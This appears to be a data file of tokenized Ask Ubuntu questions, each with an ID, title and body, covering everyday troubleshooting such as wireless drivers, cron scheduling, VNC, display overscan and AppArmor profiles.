220461	need information regarding ubuntu for android	as far as i understand , ubuntu for android is not the same as actual ubuntu in desktops . so i am confusing both with each other . please enlighten me on this . could ubuntu on android run 32bit softwares same as the pc versions do ? or it is just the arm version that would not be able to run the existing pc version softwares ? if it is arm now , would it be a 32 or 64 bit version in future ? ( ofcourse if the mobile device architecture supports it ) . will there be a separate version for tablets , so that there would be no need for separate docking and allows seamless switching from android to ubuntu internally on the device ? regards , premkumar . a
220464	wifi eub9603h and r8712u driver	i am working with r8712u - with a usb driver for rtl8712u/rtl8192su devices . i have eub9603h wifi usb card and ubuntu 12.04 . wifi sets to wlan0 with driver r8712u . i want to run my wifi-card in master mode . i have tried to use hostapd - but this card is not nl80211 . by typing iwconfig wlan0 mode master i get error that this card does n't support ap mode . but the same card works on windows in access point mode.so i have tried to use and installed windows driver on ubuntu . but error is the same . could you help me , please ? just tell me about the way to solve this problem . is it real to set this wifi-card in ap mode ? ? ?
220465	lenovo mobile broadband	i recently installed ubuntu 12.04 on my thinkpad t400 , and in addition to traditional ethernet and wifi connections , i would like to enable the mobile broadband , integrated by default on my laptop . the problemthat the system does not detect it and the lenovo support web site , are shown three types of possible cards , installed in my laptop . qualcomm gobi 1000 hs-usb modem 9202 qualcomm gobi 2000 hs-usb modem 9205 f3507g ericsson mobile broadband modem i would like to know if there are drivers for these devices and possibly how to enable the connection . i look forward to your valuable help . thanks in advance . alessandro
220467	install the ubuntu sound application in lubuntu	what is the name of the sound-control application in ubuntu 12.10 i want to install it in my lubuntu 12.10 installation .
220474	how to run a cronjob after every 5minutes	i 've tried to run a cronjob like this : 30/5 13-14 * * * ... . i.e i want to run the cron every 5minutes from 1:30pm to 2:30pm . but it does n't seems to work . am i doing something wrong ?
220478	how to get list of installable packages from repositories ?	i wanted to install a few packages but had to power down my laptop as i had a few chores to do . i did add the packages ' repositories and forgot to install the packages . as my browser history clears on closing , i could n't recall their names ( i 'm bad at names ) . i would like to know if there is any way i can inquire all available packages ( i.e . which i can download or have downloaded ) using my repositories ?
220481	saa7134 avermedia 777 not working	i have a problem with this card . multimedia controller /0/100/1e/2 producto : saa7131/saa7133/saa7135 video broadcast decoder [ 1131:7133 ] fabricante : philips semiconductors [ 1131 ] informaci贸n del bus : pci @ 0000:08:02.0 versi贸n : d1 anchura : 32 bits reloj : 33mhz capacidades : power management , bus mastering , pci capabilities listing configuraci贸n : driver : saa7134 latency : 32 recursos : irq : 18 memoria : fb7ff000-fb7ff7ff the problem is that in previous ubuntu versions , i can just install kaffeine and start watching tv programs . but now in ubuntu 12.04 kaffeine does't found any dvb card , but lshw does . dmesg | grep saa
220485	gnome shell message notication not showing notifications some times	i have installed gnome shell on ubuntu 11.10 . the message notification some times dosent show the notifications . it only appears after i close empathy and restart it . how to fix this ?
220495	atheros ar2413 wireless not working after shutdown	i am using a ubuntu 11.04 on an acer aspire 3680 laptop and my wifi is not working . i followed the below commands to install the madwifi driver : sudo su apt-get install subversion cd /usr/src svn checkout http : //madwifi-project.org/svn/madwifi/trunk madwifi tar cfvz madwifi.tgz cd madwifi make & & make install echo `` blacklist ath5k '' > > /etc/modprobe.d/blacklist.conf echo `` ath_pci '' > > /etc/modules modprobe ath_pci sudo reboot after installation i am facing the same problem . my wifi wont work after i shutdown . infact it did n't work after suspend but i rectified that problem by the following commands : command 1 : sudo rmmod -f ath_pci sudo rfkill unblock all sudo modprobe ath_pci along with the command suspend_modules=ath_pci added to the /etc/pm/config.d/madwifi directory . so if i suspend and then on my laptop the wifi loads well and does n't create a problem . but if i shutdown my laptop the wifi never loads again and eachtime i have to run a ubuntu 9.04 live cd to load it . i did try adding the command 1 to the /etc/rc.local directory but still it does n't work . so my question is : what should i do in order to make my wireless work without having to run a live cd of ubuntu 9.04 everytime after shutdown ? thanks . here are the outputs which one might need : output 1 chandru @ chandru-acer : ~ $ lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7 family ) sata ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 02:00.0 ethernet controller : marvell technology group ltd. 88e8038 pci-e fast ethernet controller ( rev 14 ) 0a:03.0 ethernet controller : atheros communications inc. ar2413 802.11bg nic ( rev 01 ) 0a:09.0 cardbus bridge : texas instruments pcixx12 cardbus controller 0a:09.2 mass storage controller : texas instruments 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) output 2 : lsmod module size used by wlan_tkip 17074 2 binfmt_misc 13213 1 parport_pc 32111 0 ppdev 12849 0 snd_hda_codec_si3054 12924 1 snd_hda_codec_realtek 255882 1 joydev 17322 0 snd_atiixp_modem 18624 0 snd_via82xx_modem 18305 0 snd_intel8x0m 18493 0 snd_ac97_codec 105614 3 snd_atiixp_modem , snd_via82xx_modem , snd_intel8x0m snd_hda_intel 24113 2 ac97_bus 12642 1 snd_ac97_codec snd_hda_codec 90901 3 snd_hda_codec_si3054 , snd_hda_codec_realtek , snd_hda_intel i915 451053 3 snd_hwdep 13274 1 snd_hda_codec snd_pcm 80042 7 snd_hda_codec_si3054 , snd_atiixp_modem , snd_via82xx_modem , snd_intel8x0m , snd_ac97_codec , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25269 1 snd_seq_midi drm_kms_helper 40971 1 i915 snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51291 2 snd_seq_midi , snd_seq_midi_event pcmcia 39671 0 snd_timer 28659 2 snd_pcm , snd_seq snd_seq_device 14110 3 snd_seq_midi , snd_rawmidi , snd_seq drm 184164 4 i915 , drm_kms_helper yenta_socket 27230 0 tifm_7xx1 12898 0 wlan_scan_sta 21945 1 ath_rate_sample 17279 1 pcmcia_rsrc 18292 1 yenta_socket psmouse 73312 0 tifm_core 15040 1 tifm_7xx1 snd 55295 18 snd_hda_codec_si3054 , snd_hda_codec_realtek , snd_atiixp_modem , snd_via82xx_modem , snd_intel8x0m , snd_ac97_codec , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device serio_raw 12990 0 i2c_algo_bit 13184 1 i915 soundcore 12600 1 snd pcmcia_core 21505 3 pcmcia , yenta_socket , pcmcia_rsrc video 19112 1 i915 ath_pci 183044 0 snd_page_alloc 14073 5 snd_atiixp_modem , snd_via82xx_modem , snd_intel8x0m , snd_hda_intel , snd_pcm wlan 224640 5 wlan_tkip , wlan_scan_sta , ath_rate_sample , ath_pci ath_hal 398701 3 ath_rate_sample , ath_pci lp 13349 0 parport 36746 3 parport_pc , ppdev , lp usbhid 41704 0 hid 77084 1 usbhid sky2 49172 0 output 3 root @ chandru-acer : ~ # lshw -c network pci ( sysfs ) *-network description : ethernet interface product : 88e8038 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 14 serial : 00:16:36 : fb : aa:64 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.28 firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:43 memory:44000000-44003fff ioport:2000 ( size=256 ) *-network description : wireless interface product : ar2413 802.11bg nic vendor : atheros communications inc. physical id : 3 bus info : pci @ 0000:0a:03.0 logical name : wifi0 version : 01 serial : 00:19:7d : d3:0c : fd width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list logical ethernet physical wireless configuration : broadcast=yes driver=ath_pci ip=192.168.1.6 latency=96 maxlatency=28 mingnt=10 multicast=yes wireless=ieee 802.11g resources : irq:18 memory : d0000000-d000ffff output 4 root @ chandru-acer : ~ # lsmod | grep ath_pci ath_pci 183044 0 wlan 224640 5 wlan_tkip , wlan_scan_sta , ath_rate_sample , ath_pci ath_hal 398701 3 ath_rate_sample , ath_pci
220502	crontab opens as blank page , can not save	i am really not familiar with linux , and only started using it recently , so be patient with me . i am trying to control a camera on regular intervals through a script that is called upon in the crontab . when i start up the computer , i can open crontab , edit and save , and everything is executed correctly . however , i can never open crontab a second time , unless i restart the computer first . if i type crontab -e , i get a blank page , located in the /tmp directory . i can enter my commands in there , but can not save it . i do n't know if this is relevant , but when i try sudo crontab -e , i get something like `` no cron installed for root '' . any help is really appreciated ! sarah [ edit ] problem solved : the problem was the editor ( gedit ) , when using nano as editor , i can access crontab , edit and save without problems !
220504	how to make chromium-browser start on vnc display ?	i have started tightvnc server on lubuntu 12.04 via the command : tightvncserver -geometry 800x600 -depth 16 :2 the vnc server successfully started and i got this message : new 'x ' desktop is gateway:2 starting applications specified in /home/dolv/.vnc/xstartup log file is /home/dolv/.vnc/gateway:2.log then i 've successfully logged in from remote pc using realvnc client . i tried to start chromium from the menu but it did n't work . so i tried to start it from the terminal with the command /usr/bim/chromium-browser & and got the following message : xlib : extention `` randr '' missing on desktop :2 i have also discovered that after my two attempts that the chromium-browser had created 2 new windows on the host on which was session running on display :0 . how to make the browser start on that display from which it was called ( in my case from the vnc session display ) ?
220505	how to enable the eclipse internal browser ( ubuntu 12.10 ) ?	i have installed eclipse 4.2 x64 on ubuntu 12.10 x64 . i need to use the internal web browser but it is disabled by default . the use internal web browser radio button in preferences - > general - > web browser is disabled . how can i enable it ? i have installed eclipse 4.2 x64 in another pc that uses ubuntu 12.04 x64 and the internal browser works perfectly .
220506	how to increase the disk space of an ubuntu vmware guest , without the cd ?	i powered off the vm and on the vmware side increased the allocated disk space . i did this by edit virtual machine settings - > hard disk - > utilities and so forth . it then warned me that i should increase the partition size within the guest vm . and i dont know how to make the machine know it and i dont know where my cd is..
220507	files missing after installation	i installed ubuntu 12.10 . after the install i ca n't find the files from windows . i had 2 local disks d : and c : , windows 7 was installed in c : , but now i ca n't find the files from d : . i used replace windows with ubuntu and thought that it will only delete the files in c : . so is the problem in me not finding them or did i make a mistake with using this option ?
220512	how can i create launcher icon for phpstorm ?	i have phpstorm on my pc , to launch it i have to go to phpstorm/bin/ and launch phpstorm.sh , how can i pin this to launcher so that i dont have to go into folders every time ?
220515	ubuntu 12.10 network connection menu gui doesnt work properly	many a times i have seen when i click on network connection ( besides volume icon ) , i am unable to select any options . when i hover over vpn connections , the list shows nothing . i have added many vpns . network menu becomes non responsive to any clicks . this is annoying because i am not able to connect to any of the vpn connections . `` enable wireless '' , `` edit connections '' or any other option doesnt work at all . restarting ubuntu fixes this issue . but problem starts randomly again and restarting my laptop is the only way to fix it . is this a known bug ? any ways to fix this prob ?
220517	ubuntu welcome screen returns after install	i am a brand new ubuntu user . i recently made the switch by creating a usb boot drive with pendrive . i followed the online instructions to have computer boot from the usb . initially , i chose the 'try ubuntu ' option . i liked what i saw , so i chose to 'install ubuntu '' . my problem is this : i believe i had followed the 'install ubuntu ' instructions to a tee ; however , after i am prompted to restart my computer after installation , i am brought back to the ubuntu welcome screen with the option to `` try ubuntu '' or `` install ubuntu '' . the bloody welcome screen keeps coming back ! my apologies if this has been answered in another forum .
220520	ro root fs on /proc/mounts	my ubuntu 9.10 is mounting the root filesystem as read only . already tried some options found on the forums like fsck , remounts , etc , but no luck ... for what i could find , my problem is is /proc/mounts : root @ wks00335 : ~ # cat /proc/mounts rootfs / rootfs rw 0 0 none /sys sysfs rw , nosuid , nodev , noexec , relatime 0 0 none /proc proc rw , nosuid , nodev , noexec , relatime 0 0 udev /dev tmpfs rw , relatime , mode=755 0 0 /dev/mapper/wks00355-root / ro , relatime , barrier=1 , data=ordered 0 0 none /sys/kernel/security securityfs rw , relatime 0 0 my root is defined as ro for etc/fstab , i 've got : root @ wks00335 : ~ # cat /etc/fstab # /etc/fstab : static ... . # comments # # < file system > ... proc /proc proc defaults 0 0 /dev/mapper/wks00355-root / ext4 errors=remount-ro 0 1 # boot was on /dev/sda5 during installation uuid=9254b90c-c665-4dc1-8e1a-7b2e6a493ca4 /boot ext2 defaults 0 2 /dev/mapper/wks00355-swap_1 none swap sw 0 0 /dev/sdc0 /media/cdrom0 udf , iso9660 user , noauto , exec , utf8 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 the question is , how can i change /proc/mounts so that /dev/mapper/wks00355-root / is rw instead of ro ?
220522	emit signal for gio.dbusproxy in python ?	i 'm using gio high level dbus api - dbusproxy object . i 'd like to emit signal on this object ( faking signal coming from remote interface ) . i do something like this : proxy.emit ( 'g-signal ' , sender_name , signal , params ) signal is emitted and then catch - sender name and signal parameters are ok , however the params is always none in signal handler , no matter what i put there ( tried glib.variant types and also python types ) . signals received normally do have params value defined . what is the issue - how to set params in the emit functions ? thanks for any help .
220524	connect to google talk without giving access to my full google account	i would like to use empathy as a google talk client . when i choose to go online , i 'm asked to give is-admin @ canonical.com ( ubuntu ) access to manage my online photo 's , google drive , emails and videos . i do n't understand why ubuntu has to have all these permissions on my google account , does this mean ubuntu will start syncing my google account to ubuntu one ? can i connect to google talk without granting access to my videos , emails and photos to ubuntu ? what do you guys want with all my online things ?
220527	how to set up an cluster server for minecraft hosting ?	i want to know how to make an hpc cluster server to host minecraft i want to use this server for gaming and other ubuntu desktop tasks i want to use vnc for this server to log in anywhere on the world and control the minecraft console please explain to me step for step how to do this because i still have a few old computers lying around , and get some for free from a friend . greetings berrylee32 ( minecraft name )
220528	disable facebook plug-in on default firefox	this may a firefox question rather than ubuntu but since the plug-in seem to be integrated with the ubuntu status bar so i think i should try my luck here . just update to firefox 17 and not sure why now when i go to facebook a icon show in launcher and a entry for facebook at the top-right conner under the message icon . how can i disable this plug-in ? it not in the list of my extensions or plugins list ! update here is an screenshot :
220529	javaws is installed and it is not installed - what is going on ?	i used the ubuntu ( 12.04 ) software-center to install icedtea web control panel and icedtea java web start to start a webstart java-file with the ending jnlp . after this is done i tried to start a file from within firefox - i was able to select open with icedtea java web start ( default ) from the pull down menu . this did not work ( unknown error occurred ) with the suggestion to download the file and start is then . i did so , and after i found out that the command for java web start is javaws i tied with that - just to find out it is not installed ( or not in the search path ) . i do not know how to continue , i.e . how to start this jnlp file from a terminal . maybe i need to install something else ? if so , what and how ? maybe i am confusing the different java 'things ' ? maybe icetea is no coffee ? i am very unexperienced with java ...
220531	can not take a screenshot when clicking on top-right system tray icon	when i say top-right icon is the : wifi , volume , clock , system gear ... when one of them showing the menu , i can not take a screenshot ! my ubuntu is 12.10 32bit .
220532	does hibernation damage ssd if swap on mech hard drive	i have my / and /home on a 120gb ssd and data and swap are on a mechanical hard drive . will using hibernation have a negative impact on my ssd or is it ok as swap is not on that drive ?
220535	terminal : binding hotkeys to textual commands	is there a way to bind hotkeys to textual commands in the terminal ? for example : ctrl+b == git branch < ret >
220538	second click on a launcher icon with more than one window open does n't do a scale of that application	in unity , if i click an icon in the launcher with multiple windows open it does n't show me all open windows for that application . however , this works in unity2d . i known there have a same question asked before : here ! but i think my condition is not as same as the previous question . ubuntu 12.04 64-bit unity 5.16.0 kernel linux 3.2.0-33-generic gnome 3.4.2 edit i just find a interest thing : there are four workspace , label it as a , b , c , d. if i firstly open two windows of firefox in a , as i mentioned above , second click on the firefox icon does nothing . but after i open a window of firefox in b , the second click on the firefox icon in workspace a magically works ! ! and then , i open two terminal in workspace c , second click doesnot work until i open another terminal window in d. so , it seems that the second click only work if the application be opened more than one workspace .
220539	open windows registers from command line	i 'm trying without success to open windows registers from command line in ubuntu . i do n't want to use wine or the tools i 've read on the web . i 'd simply like to do something as : $ vim ( or sudo vim ) registry-file and being able to watch the contents and in case modifying it . the problem is i do n't know where to find them ( i mean the path ) . i have a dual boot and i have mounted windows with the command : $ sudo mount /dev/sd3 /media/windows but now i ca n't find the registers . thanks
220543	installation problem concerning `` ubi-partman ''	i have a problem with installing ubuntu . when i try to install it , it shows me this message : ubi-partman failed with exit code 10 . further information may be found in /var/log/syslog/ where i can find this failure or how can i continue the installation process ?
220544	how can i get more info in the dash ?	when searching for the phrase 'invoices ' in the ubuntu dash , i get a few different folders that all relate to different projects . however , there is no way of seeing which is which , as i can not see the folder location ... if there was just some simple info saying its parent folder , or more detailed location , the dash would be perfect . any ideas how to do this ?
220548	how can i reduce overscan in 1080p with amd hd 6xxx - ubuntu 12.10 over hdmi	my tv and/or receiver do not have native scaling options , nor would that be feasible . installation of any catalyst drivers ( 12.9 , 12.10 , and 12.11 beta ) do not seem to work with ubuntu 12.10 ( disappearing unity on 12.9 , 12.10 , and a black screen on the 12.11 beta ) . this is over hdmi through a denon av-789 receiver and a sharp aquos lc52d85u tv . now , i know the proprietary drivers have scaling options ( command is sudo aticonfig -- tv-geometry xxy+offset-offset ) do the native 12.10 drivers have some option like this ? i am unable to reduce the significant overscan ( it 's enough to push most of the stock launcher off the screen , and no upper menu bar ) . thanks ! ubuntu 12.10 drivers tested : amd 12.6 ( non operational ) , 12.9 ( no unity ) , 12.10 ( no unity , requires additional packages e.g. , i386 ) , 12.11 ( black screen ) asus amd eah6950 ( ati hd 6950 or 6xxx ) core i7-960 , 3x2gb ddr3 , asus rampage iii gene sharp aquos lc52d85u /root , /boot , /usr is on corsair force gt 120gb , /home , /tmp , on 1tb wd black
220557	are these apparmor profiles unnecessary ?	i 'm running lubuntu 12.10 . i 've installed apparmor-profiles . i uninstalled the chromium browser have the latest chrome stable in its place . now i 'm trying to learn a little about apparmor profiles . when i enter sudo aa-status in a terminal , i see , in part , the following : [ 06:58 pm ] ~ $ sudo aa-status [ sudo ] password for vasa1 : apparmor module is loaded . 43 profiles are loaded . 20 profiles are in enforce mode . ... /usr/lib/chromium-browser/chromium-browser//browser_java /usr/lib/chromium-browser/chromium-browser//browser_openjdk /usr/lib/chromium-browser/chromium-browser//sanitized_helper ... and , a little further down : 23 profiles are in complain mode . ... /usr/lib/chromium-browser/chromium-browser /usr/lib/chromium-browser/chromium-browser//chromium_browser_sandbox /usr/lib/chromium-browser/chromium-browser//xdgsettings ... my question is this : why do i have entries relating to the chromium browser showing up ? are they of any use ? will they go away if i delete just /etc/apparmor.d/usr.bin.chromium-browser ? and is it benefical in anyway to delete that profile ( assuming i have no intention of installing the chromium browser in future ) .
220566	problems compiling library	i am having some difficulties compiling some files that i downloaded ( for academic purposes ) . i ran the following command : cd tmp/detri_2.6.a/detri then make detri_new cc=gcc to build a library from the relevant files and folders extracted to /tmp . the output is as follows : tmp/detri_2.6.a/detri $ make detri_new cc=gcc g++ makefile.cpp -o makefile makefile.cpp:16:25 : error : expected unqualified-id before ‘-’ token makefile.cpp:16:38 : error : expected unqualified-id before ‘-’ token makefile.cpp:17:1 : error : ‘libs’ does not name a type makefile.cpp:20:1 : error : ‘modules’ does not name a type [ .. ] makefile.cpp:65:73 : error : expected unqualified-id before ‘-’ token makefile.cpp:68:1 : error : expected unqualified-id before ‘.’ token makefile.cpp:68:19 : error : ‘ $ ’ does not name a type makefile.cpp:68:60 : error : expected unqualified-id before ‘-’ token makefile.cpp:71:10 : error : ‘ $ ’ does not name a type makefile.cpp:71:20 : error : expected unqualified-id before ‘-’ token makefile.cpp:71:31 : error : expected unqualified-id before ‘ -- ’ token makefile.cpp:71:43 : error : ‘ $ ’ does not name a type make : *** [ makefile ] error 1 > i have n't written the makefile.cpp ( please bear in mind this is my first week of using ubuntu and doing this sort of thing ) but previously , the compiler would attempt to build and find an error in the makefile.tmp , not in the .cpp file . now as the output shows , it is n't going past the point of trying to read the .cpp file . i am a bit lost here ... thank you update : i have tried what was suggested in the comment below , i.e . running : make -k tmpmk=makefile.tmp detri_new cc=gcc yet i still have the same ( window full of ) output errors , plus some new ones . if this is of any help , the code was obtained from the following website edit : shortened error output section and clearer explanation of the problem . here is the makefile : /* detri/makefile.cpp -- - c pre-processor makefile for detri . */ /* usage : cpp -p $ { cppmk } > $ { tmpmk } ; make -k tmpmk= $ { tmpmk } -f $ { tmpmk } ... */ /* targets . ( change this according to your needs ! ) */ dest= ../bin lib= ../lib include= ../include /* paramters : depend , shell , cc , cpp , cppmk , tmpmk , copt . */ /* system specifics : ccflags , ar , ranlib , malloc . */ # include `` makefile.sys '' /* other libraries . */ incls= -i $ { include } libraries= -l_sos $ { dbx } -l_lia $ { dbx } -l_basic $ { dbx } libs= -l $ { lib } /* source and object files . */ modules= detri.c delaunay.c flip.c prep.c \ dt.c print_dt.c search.c trist.c peel.c h_files= detri.h dt.h trist.h objects= $ { modules : .c=.o } /* interface . */ normal : detri ; @ echo `` detri ready . '' debug : ; $ { make } -k -f $ { tmpmk } detri copt= '' -d__debug__ '' dbx=-g remove : ; rm -f $ { objects } all : normal ; /* begin meta interface : make detri_new */ /* note : this is here so that we can package detri stand-alone , without the alpha shape software and it 's top-level makefile . */ basic= ../basic lia= ../lia sos= ../sos detri= ./ hd=echo `` \n\n*** x ***\n '' mk= $ { make } -k cc= '' $ { cc } '' cpp= '' $ { cpp } '' copt= '' $ { copt } '' detri_new : ; $ { mk } check soslibs_ detri_ detri_debug : ; $ { mk } check soslibs_d detri_d detri_all : ; $ { mk } check soslibs_d soslibs_ detri_ soslibs_ : basic_ lia_ sos_ detri_ : ; @ /bin/csh -cf ' $ { hd : x=detri } ; cd $ { detri } ; $ { mk } new' sos_ : ; @ /bin/csh -cf ' $ { hd : x=sos } ; cd $ { sos } ; $ { mk } new' lia_ : ; @ /bin/csh -cf ' $ { hd : x=lia } ; cd $ { lia } ; $ { mk } new' basic_ : ; @ /bin/csh -cf ' $ { hd : x=basic } ; cd $ { basic } ; $ { mk } new' soslibs_d : basic_d lia_d sos_d detri_d : ; @ /bin/csh -cf ' $ { hd : x=detri } ; cd $ { detri } ; $ { mk } clear debug' sos_d : ; @ /bin/csh -cf ' $ { hd : x=sos } ; cd $ { sos } ; $ { mk } clear debug' lia_d : ; @ /bin/csh -cf ' $ { hd : x=lia } ; cd $ { lia } ; $ { mk } clear debug' basic_d : ; @ /bin/csh -cf ' $ { hd : x=basic } ; cd $ { basic } ; $ { mk } clear debug' check : ; @ /bin/csh -cf ' \ echo checking for target dirs ; \ if ( ! -e $ { dest } ) mkdir $ { dest } ; \ if ( ! -e $ { lib } ) mkdir $ { lib } ; \ if ( ! -e $ { include } ) mkdir $ { include } \ ' /* internal rules . */ detri : $ { objects } ; $ { cc } $ { ccflags } $ { dbx } $ { copt } $ { objects } \ -o $ { dest } /detri $ { libs } $ { libraries } $ { malloc } -lm ; /* generic rule to compile source files . */ .c.o : $ { h_files } ; $ { cc } $ { ccflags } $ { dbx } $ { copt } $ { incls } -c $ *.c -o $ *.o /* to compute dependencies with `` make depend '' ... */ depend : ; $ { depend } -f $ { tmpmk } -- $ { incls } $ { modules }
220569	dual screen problem when trying to maximize the window on the second screen	i am using ubuntu 12.10 . today i bought a monitor and started using dual screens : one is my laptop 's screen , other one is the monitor i bought . everything seems fine so far except one thing and that is : if i try to maximize the window on the second screen , system automatically carries the window to the first screen and maximizes it on the first screen . i can not have fullscreen windows on the second screen . how can i fix this ? thanks in advance , amadeus
220576	alienware m14x r2 drivers ?	so i just bought a brand new alienware m14xr2 and i love the thing to death . i decided to install ubuntu 12.10 64bit on it and i was surprised how smoothly the install went , but when i went to check the additional drivers tab it could n't find anything . everything seems to be working fine on my laptop right now but it does n't have any graphics drivers and the fans seem to kick up more on my ubuntu partition than my windows partition . i downloaded the install file for the official nvidia drivers but i 'm holding off installing until i know that 's the right answer . also if anyone knows a way to control the alien fx lights on ubuntu that would be nice but i do n't care as much . thanks so much ! specs : 3rd generation intel® core™ i7-3630qm ( 6mb cache , up to 3.4ghz w/ turbo boost 2.0 ) 2 gb gddr5 nvidia® geforce® gt 650m with optimus™ 8gb of ram 256 ssd
220578	leave ubuntu server to compute in background	i have access to a server running ubuntu 12.04 lts . i connect to it using xmanager or putty . but as soon as i close my client , i will be logged from the server . so is there a way how i could shut down my local machine and let the server compute for me . i normally use the server for builds .
220583	new google chrome window jumps to different monitor upon entering character in address bar	i have 3 monitors with ubuntu 12.10 and fglrx ( amd/ati ) hd7950 and gnome 3 : google chrome 23.0.1271.64 open google chrome browser place fullscreen in rightmost monitor select new window from drop down menu in top right ( do not use quickkey ) doubleclick on title bar of new window to fullscreen in rightmost monitor give focus to address bar with mouse type any character ( for example 'w ' ) observed behaviour : window jumps from rightmost window to leftmost window expected behaviour : window stays where it is .
220584	max brightness on netbook	the maximum brightness on my netbook is n't very bright . windows 7 is very bright on max , but for some reason , ubuntu is n't . is th ere any way to adjust the brightness past it 's maximum setting ?
220587	how do i move .doc and .xls files to a new folder ?	situation : i finally convinced my dad to let me install xubuntu on his desktop , since windows xp had become extremely bloated , old - it 's a mess . so i installed xubuntu 12.10 alongside the windows partition , and he wants me to move all his .doc and .xls files to the new partition before i erase the windows partition . this is easier said than done . my dad has subdirectories upon subdirectories , and i really do n't want to have to manually go through every single folder to get all his documents and spreadsheets . question : how do i move all his .doc and .xls files to a new folder ? additional info : i know there are ways to move all files , but i only want to move files of a certain type ( .doc , .xls ) . i 've already tried find `` /media/gregory/secondary/documents and settings/gregory davidson '' -name '*.doc ' | xargs -i cp /home/gregory/documents , but when i manually checked , it had n't moved the documents in many , if not all , of the subdirectories .
220589	where can i find a pdf of the documentation for ubuntu ?	is there a full pdf manual on the ubuntu operating software that can be printed as oppose to reading on the internet ? i prefer a hard copy .
220591	is there a quick way to download a file which i have just copied the link to ?	i can open a terminal and wget it , or paste it into a web browser , but is there a way to do this from within unity ?
220592	harddisk makes noise but disk utility says its healthy	i am using seagate barracuda internal desktop 500gb hard drive . from few months i found my hard drive makes some different noise ( crushing or like metal rubbing spinning disk ) but so far all smart tests passed and pc responds normally.i really need to know why is noise when hard drive is healthy . is their any other tests which can identify minor problems in disk .
220595	upgrading ubuntu through updates	i would like to know if upgrading ubuntu from 12.04 to 12.10 via update is actually downloading the complete 12.10 os or its just the necessary files . thank you
220601	wifi is not detecting in compaq presario c700	hi i have a compaq presario c700 laptop , i just installed ubuntu 10.04 in my laptop . my wireless networks are not showing in network manager . charan @ charan-laptop : ~ $ lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation mobile pm965/gm965/gl960 memory controller hub [ 8086:2a00 ] ( rev 03 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile gm965/gl960 integrated graphics controller [ 8086:2a02 ] ( rev 03 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile gm965/gl960 integrated graphics controller [ 8086:2a03 ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801h ( ich8 family ) hd audio controller [ 8086:284b ] ( rev 03 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 1 [ 8086:283f ] ( rev 03 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 [ 8086:2830 ] ( rev 03 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 [ 8086:2831 ] ( rev 03 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 [ 8086:2832 ] ( rev 03 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 [ 8086:2836 ] ( rev 03 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev f3 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801hem ( ich8m ) lpc interface controller [ 8086:2815 ] ( rev 03 ) 00:1f.1 ide interface [ 0101 ] : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) ide controller [ 8086:2850 ] ( rev 03 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) sata ahci controller [ 8086:2829 ] ( rev 03 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 82801h ( ich8 family ) smbus controller [ 8086:283e ] ( rev 03 ) 01:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 02 ) 02:01.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ [ 10ec:8139 ] ( rev 10 ) what to do after this please let me know ...
